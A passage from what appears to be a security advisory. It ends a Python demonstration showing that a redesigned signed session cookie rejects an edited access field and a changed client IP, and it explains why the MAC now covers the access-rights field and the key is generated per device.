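    # Constructed session for a client at 10.0.0.5 (not a real address).
    c = make_cookie("admin", 1, "10.0.0.5")
    print("valid      :", verify_cookie(c, "10.0.0.5") is not None)
    print("edited acc :", verify_cookie(unsigned_rewrite(c, "access", 2), "10.0.0.5"))
    print("other ip   :", verify_cookie(c, "10.0.0.6"))
```

Two design points matter for this advisory in particular: the MAC covers the access-rights field, which the original cookie carried outside its hash, and knowledge of the firmware image gives an attacker nothing, because the key is generated on the device rather than compiled into the application.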